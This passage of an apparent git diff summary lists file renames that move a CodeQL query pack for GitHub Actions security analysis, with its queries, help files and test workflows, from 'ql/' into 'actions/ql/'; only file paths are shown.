actions/ql}/lib/ext/manual/webfactory_ssh-agent.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/xom9ikk_dotenv.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/xt0rted_pull-request-comment-branch.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/yumemi-inc_changed-files.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/zaproxy_action-baseline.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/zaproxy_action-full-scan.model.yml (100%) rename {ql => actions/ql}/lib/ext/manual/zentered_issue-forms-body-parser.model.yml (100%) rename {ql => actions/ql}/lib/ide-contextual-queries/printAst.ql (100%) rename {ql => actions/ql}/lib/ide-contextual-queries/printCfg.ql (100%) rename {ql => actions/ql}/lib/qlpack.yml (100%) rename {ql => actions/ql}/src/Debug/SyntaxError.ql (100%) rename {ql => actions/ql}/src/Debug/partial.ql (100%) rename {ql => actions/ql}/src/Models/CompositeActionsSinks.ql (100%) rename {ql => actions/ql}/src/Models/CompositeActionsSources.ql (100%) rename {ql => actions/ql}/src/Models/CompositeActionsSummaries.ql (100%) rename {ql => actions/ql}/src/Models/ReusableWorkflowsSinks.ql (100%) rename {ql => actions/ql}/src/Models/ReusableWorkflowsSources.ql (100%) rename {ql => actions/ql}/src/Models/ReusableWorkflowsSummaries.ql (100%) rename {ql => actions/ql}/src/Security/CWE-074/OutputClobberingHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvPathInjectionCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvPathInjectionCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvPathInjectionMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvPathInjectionMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvVarInjectionCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvVarInjectionCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvVarInjectionMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-077/EnvVarInjectionMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-078/CommandInjectionCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-078/CommandInjectionMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-088/ArgumentInjectionCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-088/ArgumentInjectionCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-088/ArgumentInjectionMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-088/ArgumentInjectionMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-094/CodeInjectionCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-094/CodeInjectionCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-094/CodeInjectionMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-094/CodeInjectionMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-1395/UseOfKnownVulnerableAction.md (100%) rename {ql => actions/ql}/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql (100%) rename {ql => actions/ql}/src/Security/CWE-200/SecretExfiltration.ql (100%) rename {ql => actions/ql}/src/Security/CWE-275/MissingActionsPermissions.md (100%) rename {ql => actions/ql}/src/Security/CWE-275/MissingActionsPermissions.ql (100%) rename {ql => actions/ql}/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql (100%) rename {ql => actions/ql}/src/Security/CWE-285/ImproperAccessControl.md (100%) rename {ql => actions/ql}/src/Security/CWE-285/ImproperAccessControl.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/ExcessiveSecretsExposure.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/ExcessiveSecretsExposure.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/SecretsInArtifacts.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/SecretsInArtifacts.ql (100%) rename {ql => actions/ql}/src/Security/CWE-312/UnmaskedSecretExposure.md (100%) rename {ql => actions/ql}/src/Security/CWE-312/UnmaskedSecretExposure.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaCodeInjection.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaDirectCache.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaDirectCache.ql (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md (100%) rename {ql => actions/ql}/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.md (100%) rename {ql => actions/ql}/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md (100%) rename {ql => actions/ql}/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnpinnedActionsTag.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnpinnedActionsTag.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutCritical.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutCritical.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutHigh.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutHigh.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutMedium.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UntrustedCheckoutMedium.ql (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnversionedImmutableAction.md (100%) rename {ql => actions/ql}/src/Security/CWE-829/UnversionedImmutableAction.ql (100%) rename {ql => actions/ql}/src/Security/CWE-918/RequestForgery.ql (100%) rename {ql => actions/ql}/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.md (100%) rename {ql => actions/ql}/src/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql (100%) rename {ql => actions/ql}/src/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/src/codeql-suites/actions-all.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-bughalla.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-code-scanning.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-security-and-quality.qls (100%) rename {ql => actions/ql}/src/codeql-suites/actions-summaries-queries.qls (100%) rename {ql => actions/ql}/src/qlpack.yml (100%) rename {ql => actions/ql}/test/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/commands.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/expression_nodes.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/multiline.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/multiline2.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/poisonable_steps.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/shell.yml (100%) rename {ql => actions/ql}/test/library-tests/.github/workflows/test.yml (100%) rename {ql => actions/ql}/test/library-tests/commands.expected (100%) rename {ql => actions/ql}/test/library-tests/commands.ql (100%) rename {ql => actions/ql}/test/library-tests/poisonable_steps.expected (100%) rename {ql => actions/ql}/test/library-tests/poisonable_steps.ql (100%) rename {ql => actions/ql}/test/library-tests/test.expected (100%) rename {ql => actions/ql}/test/library-tests/test.ql (100%) rename {ql => actions/ql}/test/library-tests/workflowenum.expected (100%) rename {ql => actions/ql}/test/library-tests/workflowenum.ql (100%) rename {ql => actions/ql}/test/qlpack.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/calling_composite.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/calling_workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/.github/workflows/reusable_workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSinks.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSinks.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSources.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSources.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSummaries.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/CompositeActionsSummaries.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSinks.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSinks.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSources.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSources.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSummaries.expected (100%) rename {ql => actions/ql}/test/query-tests/Models/ReusableWorkflowsSummaries.qlref (100%) rename {ql => actions/ql}/test/query-tests/Models/action1/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/.github/workflows/output1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/.github/workflows/output2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/path1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test10.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test11.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test12.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test13.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test14.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test15.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test16.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test17.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test18.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test19.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test7.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test8.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/.github/workflows/test9.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-078/CommandInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning7.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning8.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/composite-action-caller-4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/inter-job5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/json_wrap.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/level0.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/level1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/matrix_flow.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/priv_pull_request.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/push.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/self_needs.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test10.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test11.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test12.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test13.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test14.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test15.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test16.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test17.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test18.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test19.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test20.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test21.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test22.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test23.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test24.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test25.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test26.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test27.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test28.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test29.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test7.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test8.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/test9.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-200/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-200/SecretExfiltration.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-200/SecretExfiltration.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-284/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-284/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-285/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-285/.github/workflows/test2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-285/ImproperAccessControl.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/.github/workflows/test1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/SecretsInArtifacts.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/code_injection2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_code_injection1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache3.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/neg_poisonable_step2.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step1.yml (100%) rename {ql => actions/ql}/test/query-tests/Security/CWE-349/.github/workflows/poisonable_step2.yml (100%) rename {ql => 